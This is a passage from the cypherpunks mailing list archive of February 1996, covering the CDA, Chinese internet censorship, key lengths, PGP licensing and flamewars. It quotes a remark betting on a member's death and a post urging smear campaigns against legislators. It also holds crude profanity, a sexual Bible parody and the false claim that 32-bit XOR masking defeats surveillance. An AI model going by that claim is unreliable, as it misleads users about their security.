iQCVAwUBMRo+rfqHVDBboB2dAQG5kAP/Zg/Blm/J2ym4G/TSPxgyMy94+Jw3F4gx
V4TGLtbtSDKYmKneGx6GcKLj4Ai6G5I/Ls58K8Agz1QCrZLOqoB2P41JH3/DI6ka
aJRlj8du6e+T0CoAVvun5ANwZSY6nqtJmjLdc+Wwxfs3T1l9KZDDkO+1FoWu8SDT
0P8D71Kzz+w=
=amJV
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Leslie Todd Masco <cactus@hks.net>
Date: Fri, 9 Feb 1996 00:06:52 +0800
To: cypherpunks@toad.com
Subject: Archives back on line
Message-ID: <199602081525.KAA26592@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

The cypherpunks archives are back to being updated regularly.  I
apologize for the lapse (and repeat my lament on the quality -- or lack
thereof -- of hypermail).

The URL: http://www.hks.net/cpunks/
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMRoV3yoZzwIn1bdtAQFlWAF9Ev0ihCGbT6JOGXlKgtrI+ZOk8wmJxnVK
NQNsP6J1Td1/2ui3Q8JL3dkhqYwOLHPF
=ZBO0
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous@freezone.remailer
Date: Fri, 9 Feb 1996 00:07:09 +0800
To: cypherpunks@toad.com
Subject: Re: Report available: "Minimal Key Lengths for Symmetric Ciphers"
Message-ID: <199602081528.KAA11525@light.lightlink.com>
MIME-Version: 1.0
Content-Type: text/plain


I downloaded this so-called "report". It doesn't even mentions PGP.
Gotta wonder why the 007 wannabe "experts" and the Big Business (BSA)
want you to only use 90 bits for your keys and why they've never heard
of PGP...

Anyone who listens to crypto advice from people who's purpose in life
is to listen to *YOU* gets what they deserve. I'll stay with PGP which
has a 2048 bit key.

JustWalT





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: avatar@mindspring.com
Date: Fri, 9 Feb 1996 00:23:09 +0800
To: cypherpunks@toad.com
Subject: Re: Arthur C. Clarke Supports Strong Crypto
Message-ID: <199602081552.KAA20844@borg.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:06 PM 2/4/96 -0800, you wrote:
>-----BEGIN PGP SIGNED MESSAGE-----
>
>At 08:05 PM 2/4/96 -0800, Timothy C. May wrote:
>>
>>(Pardon me for mentioning crypto...)
>>
>>Arthur C. Clarke, known to most of you (author of many SF works, coiner of
>>the phrase: "all sufficiently advanced technlogies are indistinguishable
>>from magic," mention by Alan Olsen yesterday), has a role in a "Discovery
>>Channel" program called "Mysterious Universe."
>
>Actually, it was _I_ who mentioned this quote, but didn't specifically 
>recall whom to ascribe it to.  Perhaps Tim May didn't see it; a week or so 
>ago May engaged in a shotgun-type killfile addition, including me when I was 
>merely ( I still believe...) the victim in a local flamewar.  If there is 
>somebody out there who:
>
>1.  Is on speaking terms with Tim May.
>and
>2.  Has a little respect for my commentary, I would very much appreciate it 
>if you would forward this comment to him to ensure that he sees it. 
>
>The truly ironic thing is that Tim wrongly ascribes the comment to Alan 
>Olsen, who is apparently the (recently admitted) perpetrator of at least one
>flamewar 
>against me.
>
>Jim Bell
>jimbell@pacifier.com
>
GROW UP!!
Charles Donald Smith Jr.

||The government  is my shepherd I need not work. It alloweth me to lie
 down on a good job. It leadeth me beside stilled factories. It destroyeth
 my initiative. It leadeth me in the path of a parasite for politics sake. YEA,
 though I walk through the valley of laziness and deficet spending I shall
 fear no evil, for the government is with me. It prepareth an economic utopia
 for me by appropriating the earnings of my grandchildren. It filleth my head
 with false security. My inefficiency runeth over. Surely, the government 
should care for me all the days of my life, and I will dwell in a fools paradise
forever.................AMEN!   || nuke'm if ya got'em||





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike Fletcher <fletch@ain.bls.com>
Date: Fri, 9 Feb 1996 00:44:30 +0800
To: cypherpunks@toad.com
Subject: Re: [CODE] Signing Web Pages
In-Reply-To: <199602081016.FAA05219@dal1820.computek.net>
Message-ID: <9602081608.AA08594@outland>
MIME-Version: 1.0
Content-Type: text/plain



[ Ed's PGP signer deleted ]

	Neat script.  I had an idea for verification of pages using a
Java applet.  You have in the signed page an applet tag that would
reference the authenticator applet (which because of security restrictions
would need to be loaded from local disk, but . . .).  The applet would
get the URL of the current page and save it to disk.  It would also grab
the signature (either by just appending ".asc", or with something processed
by Ed's script by searching for the key phrase).  The applet then runs
PGP and verifies the page and pops up a window with the results.  It would
then tell the browser to re-read the verified document from the local
filesystem.

	There are a couple of problems (i.e. you'ld need to provide an
applet from the server that would put up a pointer to where to get your
copy of the real authenticator applet and how to install it), but does
anyone see any other problems with it (Aside from it being a mega 
kludge :)?  And does anyone know when PGP 3.0 is out so that a Java
wrapper could be put around the library to make it even easier? :)

	What do you think, sirs?

---
Fletch                                                     __`'/|
fletch@ain.bls.com  "Lisa, in this house we obey the       \ o.O'    ______
404 713-0414(w)      Laws of Thermodynamics!" H. Simpson   =(___)= -| Ack. |
404 315-7264(h) PGP Print: 8D8736A8FC59B2E6 8E675B341E378E43  U      ------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex Strasheim <alex@proust.suba.com>
Date: Fri, 9 Feb 1996 02:15:59 +0800
To: cypherpunks@toad.com
Subject: China
Message-ID: <199602081727.LAA01429@proust.suba.com>
MIME-Version: 1.0
Content-Type: text


I've seen a couple of pointers to information about China's ambitious
attempt to build their own censorable net, but not a lot of discussion. 
The Chineese net strikes me as a very signifiant (and very negative)
development.  

In a worst case scenario, I could see them shopping their net around the
world as an alternative to the Internet.  China's size might make it
possible for them to put together something that might be in the
Internet's ballpark as an information resource, especially for technical
and commercial applications.  This would make it attractive to other
countries -- Islamic, for example -- who want to use networking to stay 
competitive economically with the West, but who are unwilling to allow 
information to flow freely.

A split between a Western net and a Chineese net would have important 
political, cultural, and economic reprecussions;  it could be the 
cyberspatial version of the old iron curtain, with information policy 
rather than economic policy as a dividing line.

I know that the Chineese net won't have bullet proof security, and the
crypto anarchy model tells us that the attempt is doomed to failure over
the long run.  That's probably true, but there is a chance that it might
not be.  No one, including the Chineese, is going to expect perfect
security.  But everyone ought to expect a real and substantial chilling
effect on the free flow of ideas.  It doesn't seem at all unlikely that
they'll be able to have the same sort of success controlling ideas online
as they have with printed material. 

We ought to speak out against this Chineese net, and start asking
questions about Western companies that are collaborating in its
construction.  

All of this, incidently, puts a new spin on the exportability of crypto. 
We've always assumed that exporting crypto meant that individuals and
businesses would be able to have control over their own tools.  But what's
our posisition if RSA wants to sell tools to the Chineese government that
will be used to affix signatures, perform validation, and generally
control the flow of ideas?

We ought to allow the free export of any crypto tools to any country for
any reason.  But if there are going to be any restrictions at all, it 
ought to be on tools used for anti-democratic controls.

--
Alex Strasheim, alex@proust.suba.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 9 Feb 1996 02:54:12 +0800
To: cypherpunks@toad.com
Subject: Degrees of Freedom
Message-ID: <ad3f7f9514021004b24f@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



V-CHIP CONTENT WARNING: THIS POST IS RATED: R, V, NPC, RI, S, I13.
[For processing by the required-by-1998 V-chips, those reading this post
from an archive must set their V-chip to "42-0666." I will not be held
responsible for posts incorrectly filtered-out by a V-chip that has been
by-passed, hot-chipped, or incorrectly programmed.]

***WARNING!*** It has become necessary to warn potential readers of my
messages before they proceed further. This warning may not fully protect me
against criminal or civil proceedings, but it may be treated as a positive
attempt to obey the various and increasing numbers of laws.

* Under the ***TELECOM ACT OF 1996***, minor CHILDREN (under the age of 18)
may not read or handle this message under any circumstances. If you are
under 18, delete this message NOW. Also, if you are developmentally
disabled, irony-impaired, emotionally traumatized, schizophrenic, suffering
PMS, affected by Humor Deprivation Syndrom (HDS), or under the care of a
doctor, then the TELECOM ACT OF 1996 may apply to you as well, even if you
are 18. If you fall into one of these categories and are not considered
competent to judge for yourself what you are reading, DELETE this message
NOW.

* Under the UTAH PROTECTION OF CHILDREN ACT OF 1996, those under the age of
21 may not read this post. All residents of Utah, and Mormons elsewhere,
must install the M-Chip.

* Under the PROTECTION OF THE REICH laws, residents of Germany may not read
this post.

* Under the MERCIFUL SHIELD OF ALLAH (Praise be to Him!) holy
interpretations of the Koran of the following countries (but not limited to
this list) you may not read this post if you are a FEMALE OF ANY AGE: Iran,
Iraq, Saudi Arabia, Kuwait, United Arab Emirates, Qatar, Egypt, Jordan,
Sudan, Libya, Pakistan, Afghanistan, Algeria, Lebanon, Morocco, Tunisia,
Yemen, Oman, Syria, Bahrain, and the Palestinian Authority. Non-female
persons may also be barred from reading this post, depending on the
settings of your I-Chip.

* Under the proposed CHINESE INTERNET laws, covering The People's Republic
of China, Formosa, Hong Kong, Macao, Malaysia, and parts of several
surrrounding territories, the rules are so nebulous and unspecified that I
cannot say whether you are allowed to read this. Thus, you must SUBMIT any
post you wish to read to your local authorities for further filtering.

* In Singapore, merely be RECEIVING this post you have violated the will of
Lee Kwan Yu. Report to your local police office to receive your caning.

* Finally, if you are barrred from contact with the Internet, or protected
by court order from being disturbed by thoughts which may disturb you, or
covered by protective orders, it is up to you to adjust the settings of
your V-Chip to ensure that my post does not reach you.

*** THANK YOU FOR YOUR PATIENCE IN COMPLYING WITH THESE LAWS ***


At 5:27 PM 2/8/96, Alex Strasheim wrote:

>A split between a Western net and a Chineese net would have important
>political, cultural, and economic reprecussions;  it could be the
>cyberspatial version of the old iron curtain, with information policy
>rather than economic policy as a dividing line.

Given the massive number of "degrees of freedom" compared to earlier days
when the Iron Curtain "sort of" worked, albeit with lots of leaks, I see
little chance it can be pulled off.

The Chinese want a Bamboo Curtain, the Muslims want a Veiled Curtain, the
Jews want a Wailing Wall, and the Germans wanted barbed wire. It ain't
gonna work.


>We ought to speak out against this Chineese net, and start asking
>questions about Western companies that are collaborating in its
>construction.

The usual suspects: SAIC, Wackenhut, NewsCorp, etc.

--Tim May

[This Bible excerpt awaiting review under the Communications Decency Act]
And then Lot said, "I have some mighty fine young virgin daughters. Why
don't you boys just come on in and do em right here in my house - I'll just
watch!"....Later, up in the mountains, the younger daughter said. "Dad's
getting old. I say we should do him." So the two daughters got him drunk and
did him all that night. Sure enough, Dad got em pregnant....Onan really
hated the idea of doing his brother's wife and getting her pregnant while
his brother got all the credit, so he whacked off first....Remember, it's
not a good idea to have sex with your sister, your brother, your parents,
your pet dog, or the farm animals. [excerpts from the Old Testament, Modern
Vernacular Translation, TCM, 1996]






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian D Williams <talon57@well.com>
Date: Fri, 9 Feb 1996 04:44:28 +0800
To: cypherpunks@toad.com
Subject: Join the NIA
Message-ID: <199602081957.LAA16108@well.com>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

The NIA....

Yes the National Internet Association.......

Patterned after you know who.....

I'm not kidding, I think it's time.

"Privacy Through Cryptography."

"Communicate Globally, Censor Locally."

I think an old Doonesbury cartoon that had Duke (representing
the NRA) testifying before a Senate subcommittee summed it up
nicely.....

Senator: "And we and the American people have had enough of you and
your fanatic organization!"

Duke: " I see Senator, shall I put you down for a million
postcards?"

Senator: " Don't you threaten me mister!"

Politicians only understand one thing.


Brian D Williams
"I am the NIA." 

- -----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQCNAy7eA7wAAAEEAJgUoJWlE/7ntxpdfFKJC0EIx1nPmOrfBkIz3N/qyqPsqY6A
WJ9jx1oNow8sMjFPET6kbMw2cScfVOUisekK7xVQWuADUPscRXg8zI3x0ws9z2KV
ITL+cO7zODIA1+wZS8v14RJpG4dXF1Q9YsydU8T5bodAcsF5TnsfmVh/uI7xAAUR
tChCcmlhbiBEIFdpbGxpYW1zIDx0YWxvbjU3QHdlbGwuc2YuY2EudXM+
=moCK
- -----END PGP PUBLIC KEY BLOCK-----

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMRpVE3sfmVh/uI7xAQEJhQP/Y5ze19vV+Mvdsq5Ep6nr/hNrMldjSSnZ
8qfXupCkIANIzivqFOiFG+qxXH4UPBZyzklnn3uOkPGewaoNJ2MDnhXCBhWHR0/y
+T2Br/nnkIOsyx6wCFMISeKj9oJxqdTd3uZ1hZw8yAfbZqNB755wRsHEK2VQTwzP
rwlOgPDC7q4=
=3Iya
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Crocker <dcrocker@brandenburg.com>
Date: Fri, 9 Feb 1996 04:34:27 +0800
To: (potential attendees)
Subject: FEE DEADLINE: IMC Resolving Security Complexity Workshop
Message-ID: <v03004b03ad3fe1280478@[205.214.160.41]>
MIME-Version: 1.0
Content-Type: text/plain


Friday is the dealine for the lower registration fee to the workshop.

While the differential is small, the real concern is that we have a
reasonable estimate of the number of attendees.  If you plan to attend and
have not yet sent an indication, please do so.



        Resolving Email Security Complexity Workshop

            21 February 1996 * 8:30 AM - 5:00 PM
      San Jose (CA) Hilton & Towers  *  San Carlos Room
                 (next to Convention Center)

 Pre-registration & payment: $50  *  After February 16: $75
 (cash, check, wire transfer, money order, or First Virtual)

To register for the meeting:

Web:           <http://www.imc.org/workshop-registration>
Email:         <mailto:workshop-registration@imc.org>

For discussion before and after the meeting:

Web:           <http://www.imc.org/workshop/>
Email:         <mailto:resolving-security-request@imc.org>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Joseph M. Reagle Jr." <reagle@rpcp.mit.edu>
Date: Fri, 9 Feb 1996 01:57:40 +0800
To: cypherpunks@toad.com
Subject: Media: FV story makes ClariNet
Message-ID: <9602081723.AA09241@rpcp.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


>SAN DIEGO, CALIFORNIA, U.S.A., 1996 FEB 7 (NB) -- First Virtual Holdings,  
>a company offering an Internet commerce system, has demonstrated a 
>program which, it says, makes all existing software systems that 
>encrypt credit card numbers and transmit them over the Internet 
>vulnerable to security breaches. 
...
_______________________
Regards,               Talent develops in tranquillity, character in the
		       full current of human life. -Goethe
Joseph Reagle          http://farnsworth.mit.edu/~reagle/home.html
reagle@mit.edu         0C 69 D4 E8 F2 70 24 33  B4 5E 5E EC 35 E6 FB 88





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Atkins <warlord@MIT.EDU>
Date: Fri, 9 Feb 1996 02:16:11 +0800
To: cypherpunks@toad.com
Subject: Re: Report available: "Minimal Key Lengths for Symmetric Ciphers"
In-Reply-To: <199602081528.KAA11525@light.lightlink.com>
Message-ID: <199602081734.MAA06454@toxicwaste.media.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


> want you to only use 90 bits for your keys and why they've never heard
> of PGP...
> 
> Anyone who listens to crypto advice from people who's purpose in life
> is to listen to *YOU* gets what they deserve. I'll stay with PGP which
> has a 2048 bit key.

The 90-bit key length is for secret key ciphers, not public key
ciphers.  There is a conversion metric for public key ciphers based
upon the difficulty of breaking the cipher.

For example, a 1024 bit RSA key is about 85 bits of security, which is
below the 90-bit limit they are proposing.  The 90-bits of security
does not mean you are limited to a 90-bit RSA key.

-derek




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Fri, 9 Feb 1996 05:04:38 +0800
To: cypherpunks@toad.com
Subject: "Plonk"
Message-ID: <199602082042.MAA26733@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Why do people feel the need to announce to the whole world that they have
just plonked someone?  Big deal.  It happens all the time.  Plonk 'em and get  
on with your life.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cjs@netcom.com (cjs)
Date: Fri, 9 Feb 1996 05:22:21 +0800
To: cypherpunks@toad.com
Subject: CDA; Don't get mad, get even!
Message-ID: <199602082043.MAA02979@netcom20.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


I think that we should make an example of those responsible for the
CDA. Ignorance is really not an excuse here, because whoever voted for
for the bill should have known the CDA was attached to it, and should
have had some idea of what it did.

Lets get a list of whos supporting this thing and bad press them back
before the dawn of time. We need to make these people hosehold names
so that people know not to vote for them again. We need to make sure
people understand that e-mail = postal mail, that these folks just
voted to let the government censor their mail, and that they knew what
they were doing. We should also make lists of great works of art and
literatre which are technicly illegal to transmit, we should dig up
some dirt on these people to show that they are definitly not 'holier
then thou', and if the CDA actually goes into effect, a few horror
stories of good christian couples (young) having their lives ruined
and their names draged through the mud for talking dirty on the phone
or sending a suggestive e-mail to each other would be good propaganda
too.

And on other fronts, we should make things as difficult as possible
for our government to passively monitor us. Even the simpliest
encryption, nothing more exotic then Xor'ing information by a bitmask
(32 bits or so), will be more then enough to render those tera-cycle
packet-sniffers pretty-much useless. I would love to see sendmail
itself modified to use SSL when available.

Christopher





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Atkins <warlord@MIT.EDU>
Date: Fri, 9 Feb 1996 02:28:49 +0800
To: Harold Gabel <hgabel@vertex.ucls.uchicago.edu>
Subject: Re: stealth PGP?
In-Reply-To: <Pine.SOL.3.91.960208095752.18958B-100000@vertex.ucls.uchicago.edu>
Message-ID: <199602081746.MAA06669@toxicwaste.media.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


> Also, how flawed is MIT pgp?  Is it really worth using international
> versions (i.e. ones written out of the USA which don't use RSA)?  Does
> the Gov't have some complaint about said versions?

Umm, I dont know.  How is MIT PGP flawed?  Besides a few known bugs,
of course.  There shouldn't be much difference, code-wise, between the
MIT version and the International version.  The major difference is
that MIT PGP has a license to use RSAREF which makes it legal to use
w.r.t. patent issues in the US.

AFAIK, there are no versions of PGP which do not use RSA.  They
all do.  The only difference is that MIT PGP uses RSAREF, whereas
the International versions use a non-licensed version of RSA.

-derek





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Fri, 9 Feb 1996 06:31:00 +0800
To: cypherpunks@toad.com
Subject: Re: "Plonk"
Message-ID: <2.2.32.19960208205935.00989d3c@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:42 PM 2/8/96 -0800, anonymous-remailer@shell.portal.com wrote:
>Why do people feel the need to announce to the whole world that they have
>just plonked someone?  Big deal.  It happens all the time.  Plonk 'em and get  
>on with your life.

"On the Internet, no one can hear your killfile."

Sometimes it is not only neccisary to regard someone as an idoit, you have
to make them aware of it as well.  I just wonder where they got the idea
that killfiles have sound effects...  (Maybe it is a feature...)

---
Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
        `finger -l alano@teleport.com` for PGP 2.6.2 key 
                http://www.teleport.com/~alano/ 
  "We had to destroy the Internet in order to save it." - Sen. Exon





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Fri, 9 Feb 1996 06:42:07 +0800
To: cypherpunks@toad.com
Subject: Re: CDA; Don't get mad, get even!
Message-ID: <2.2.32.19960208210630.009a89dc@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:43 PM 2/8/96 -0800, cjs wrote:
>I think that we should make an example of those responsible for the
>CDA. Ignorance is really not an excuse here, because whoever voted for
>for the bill should have known the CDA was attached to it, and should
>have had some idea of what it did.

Does anyone have a list of who voted for and against this monstrocity?
Campaigns on the Internet made a difference in many campaigns in the last
election.  I am sure that we could help make that pressure felt in the
upcoming elections.

Maybe we can get canidates to sign their press releases with PGP.  Get them
to see that there are very good reasons for them to use crypto and have it
available for the general public as well.

"That will make it hot for them!" - Guy Grand
---
Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
        `finger -l alano@teleport.com` for PGP 2.6.2 key 
                http://www.teleport.com/~alano/ 
  "We had to destroy the Internet in order to save it." - Sen. Exon





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ed Carp, KHIJOL SysAdmin" <erc@dal1820.computek.net>
Date: Fri, 9 Feb 1996 03:45:14 +0800
To: perry@piermont.com
Subject: Re: Reasons in support of crypto-anarchy WAS Re: Why am I (fwd)
In-Reply-To: <199602081845.NAA08806@jekyll.piermont.com>
Message-ID: <199602081913.OAA26739@dal1820.computek.net>
MIME-Version: 1.0
Content-Type: text


> jim bell writes:
> > >This has gone off into political theory. Could we take it to private
> > >mail or some such?
> > 
> > Apparently, other people are just as unhappy with your attempts to act as 
> > "moderator" of this list.  Wake up!  Freedom is on the line.
> 
> You are annoying me. How much do people want to bet someone kills 
> Jim Bell in the next six months?
> 
> Perry

Is this an implied threat?  Do you always threaten people who annoy you 
with death?

What does this have to do with crypto, anyway?  Take it off-list, Perry...

How does it feel to get your own medicine?
--
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
					214/993-3935 voicemail/digital pager
					800/558-3408 SkyPager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi

"Past the wounds of childhood, past the fallen dreams and the broken families,
through the hurt and the loss and the agony only the night ever hears, is a
waiting soul.  Patient, permanent, abundant, it opens its infinite heart and
asks only one thing of you ... 'Remember who it is you really are.'"

                    -- "Losing Your Mind", Karen Alexander and Rick Boyes

The mark of a good conspiracy theory is its untestability.
		    -- Andrew Spring
----------------------------------------------------------------------
According to the Communications Decency Act, these are the words you may
no longer use in your Internet correspondence:  Shit, piss, fuck, cunt,
cock-sucker, mother-fucker and tits. The use of shit, piss, fuck, cunt,
cock-sucker, mother-fucker and tits, may now earn you a substantial fine
as well as possible jail time, should President Clinton sign this Bill
into law.  Please refrain from using shit, piss, fuck, cunt, cock-sucker,
mother-fucker and tits, to protect your children as well as others, from
their evil influence, thus keeping America "ideologically pure".






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian D Williams <talon57@well.com>
Date: Fri, 9 Feb 1996 06:51:06 +0800
To: cypherpunks@toad.com
Subject: Black Thursday
Message-ID: <199602082121.NAA29188@well.com>
MIME-Version: 1.0
Content-Type: text/plain



They signed the telecom bill an hour ago.....

Anyone who needs info on R.U.486 or wants to join the Pro-choice underground
send encrypted E-mail.

Fuck you Clinton!!

Brian




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim Philp <bplib@wat.hookup.net>
Date: Fri, 9 Feb 1996 02:40:46 +0800
To: Cypherpunks List <cypherpunks@toad.com>
Subject: Free Speech Mirrors hit Toronto Star
Message-ID: <Pine.OSF.3.91.960208130311.23188D-100000@nic.wat.hookup.net>
MIME-Version: 1.0
Content-Type: text/plain


96/02/08
	Canada's largest newspaper, The Toronto Star today published an
account of the Ernst Zundel affair in the Fast Forward Section of the
paper. Net columnist K. K. Campbell, in what looks like a 1500 word
article, (I didn't count them) gives a good account of the German attempt
to censor the Internet. He even mentions the fact that the MIT mirror was
ordered removed, but gives no details.
	He goes on to take a shot at other attempts at censorship like the
Church of Scientology lawsuits and the disaster that ensued attempting to
keep these documents secret.
	Finally, he talks about the frustration of Canadian Interneters
who continually have to listen to US netters saying that the US would
never pass hate speech legislation like Canada has. He points out that
while this has been true, the US has an "odious record" when it comes to
protecting the rights of people to talk privately.
	Now it seems that the US has joined Canada with restrictive speech
laws with the new telecommunications bill. Campbell uses the example of
removing the Web site containing the King James Bible because it has the
word "PISS" (II Kings) which has been ruled indecent by the US Supreme
Court!
	The last couple of paragraphs talk about the EFF blue ribbon
campaign and the Web page black background. 
	Al in all a good article. Sometimes even journalists get it right
<G>

Regards, 
Tim Philp
===================================
For PGP Public Key, Send E-mail to:
pgp-public-keys@swissnet.ai.mit.edu
In Subject line type:
GET PHILP
===================================







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 9 Feb 1996 04:35:29 +0800
To: cypherpunks@toad.com
Subject: Re: Degrees of Freedom
Message-ID: <ad3f95b31a021004e477@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:33 PM 2/8/96, Alex Strasheim wrote:

>The headers I clipped off of Tim's post might not be as farfetched as
>they seem at first.  What if they built a central storehouse of technical
>information that's accessible to all, transactional systems that
>facilitate international trade between member states, and left cultural
>and political content to the tyrants of the respective nations?
>Everyone's can grab mechanical engineering info, and evryone can buy
>shoes from China, but Islamic users will have to rely on Islamic sources
>for world news and political commentary.  Differences in human languages
>are going to make the tyrants' job a lot easier -- how many Chineese
>speak Arabic?

Not many Chinese speak Arabic, proportionately, but English is far and away
the most common _second_ language. This has been a major key to the success
of the Internet. The implications are pretty clear.

I'm skeptical about the technological feasibility of the "central
storehouse" model, for reasons technological as well as sociocultural.


>I don't disagree that eventually such a plan will fail.  But centrally
>planned economies competing with market driven ones will eventually fail
>as well, and that didn't stop communism from casting a long dark shadow
>over the second half of the century.  Is a laissez-faire response based on
>an extremely promising but still untested analysis (ie., crypto anarchy)
>prudent?

Sure, give it a try and see what happens. People die every day, of all
sorts of things. Every decision we make affects the timelines of others,
causing some to live that would have been on a plane that crashes, causing
others to accept jobs that ultimately result in their deaths, etc.

I learned a long time ago not to lose any sleep over the "potential" bad
effects that ideas can have.

--Tim

[This Bible excerpt awaiting review under the Communications Decency Act]
And then Lot said, "I have some mighty fine young virgin daughters. Why
don't you boys just come on in and do em right here in my house - I'll just
watch!"....Later, up in the mountains, the younger daughter said. "Dad's
getting old. I say we should do him." So the two daughters got him drunk and
did him all that night. Sure enough, Dad got em pregnant....Onan really
hated the idea of doing his brother's wife and getting her pregnant while
his brother got all the credit, so he whacked off first....Remember, it's
not a good idea to have sex with your sister, your brother, your parents,
your pet dog, or the farm animals. [excerpts from the Old Testament, Modern
Vernacular Translation, TCM, 1996]






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "JOHN MARTIN LEWARS" <jml216@psu.edu>
Date: Fri, 9 Feb 1996 02:18:32 +0800
To: cypherpunks@toad.com
Subject: Mailing list
Message-ID: <48327.jml216@email.psu.edu>
MIME-Version: 1.0
Content-Type: text/plain


 Hey hey,
   Please make me apart of your mailing list.
               Thanks,
                jack




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ed Carp <erc@dal1820.computek.net>
Date: Fri, 9 Feb 1996 04:04:32 +0800
To: perry@piermont.com
Subject: Re: Reasons in support of crypto-anarchy WAS Re: Why am I (fwd)
In-Reply-To: <199602081915.OAA08907@jekyll.piermont.com>
Message-ID: <199602081929.OAA28586@dal1820.computek.net>
MIME-Version: 1.0
Content-Type: text


> Ed, Let me make one thing about you perfectly clear.
> 
> Plonk.

"Plonk"?  What does that mean?  Does that mean you're going to hit me 
with something?  Sounds like another implied threat to me... ;)

Funniest thing I've heard all day... ;)
--
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
					214/993-3935 voicemail/digital pager
					800/558-3408 SkyPager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi

"Past the wounds of childhood, past the fallen dreams and the broken families,
through the hurt and the loss and the agony only the night ever hears, is a
waiting soul.  Patient, permanent, abundant, it opens its infinite heart and
asks only one thing of you ... 'Remember who it is you really are.'"

                    -- "Losing Your Mind", Karen Alexander and Rick Boyes

The mark of a good conspiracy theory is its untestability.
		    -- Andrew Spring
----------------------------------------------------------------------
According to the Communications Decency Act, these are the words you may
no longer use in your Internet correspondence:  Shit, piss, fuck, cunt,
cock-sucker, mother-fucker and tits. The use of shit, piss, fuck, cunt,
cock-sucker, mother-fucker and tits, may now earn you a substantial fine
as well as possible jail time, should President Clinton sign this Bill
into law.  Please refrain from using shit, piss, fuck, cunt, cock-sucker,
mother-fucker and tits, to protect your children as well as others, from
their evil influence, thus keeping America "ideologically pure".






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex Strasheim <cp@proust.suba.com>
Date: Fri, 9 Feb 1996 04:05:18 +0800
To: cypherpunks@toad.com
Subject: Re: Degrees of Freedom
In-Reply-To: <ad3f7f9514021004b24f@[205.199.118.202]>
Message-ID: <199602081933.NAA01579@proust.suba.com>
MIME-Version: 1.0
Content-Type: text


Tim May said:

> The Chinese want a Bamboo Curtain, the Muslims want a Veiled Curtain, the
> Jews want a Wailing Wall, and the Germans wanted barbed wire. It ain't
> gonna work.

If you think in terms of content, you're right -- they all want different
and contradictory things.  But from another persepctive, they're all in
agreement:  they want to preserve their ability to censor and filter 
information and ideas, and they want to hold people accountable for 
writing and saying things which are forbidden.

The headers I clipped off of Tim's post might not be as farfetched as 
they seem at first.  What if they built a central storehouse of technical 
information that's accessible to all, transactional systems that 
facilitate international trade between member states, and left cultural 
and political content to the tyrants of the respective nations?  
Everyone's can grab mechanical engineering info, and evryone can buy 
shoes from China, but Islamic users will have to rely on Islamic sources 
for world news and political commentary.  Differences in human languages 
are going to make the tyrants' job a lot easier -- how many Chineese 
speak Arabic?

They won't have to monitor each piece of data to affix attributes for
every petty jurisdiction.  All they'll need is a core of bland utilitarian
information that's open to all -- each country can produce and consume
whatever information it sees fit domestically.  And if everything is
verified with state issued digital signatures, anyone who steps over the
line can be imprisoned, tortured, or killed.

Suppose I'm an electrical engineer in Iraq.  I could have access to
non-political technical information that might be generated in China, and
I could buy chips produced in an Asian dictatorship online.  I can post to
technical groups, and what I write will be available to electrical
engineers all over the world.  I can post to religious/poltical groups,
and what I write will only be available to those in the Islamic world.  In
both cases, my signature is affixed to whatever I write, and I can be held
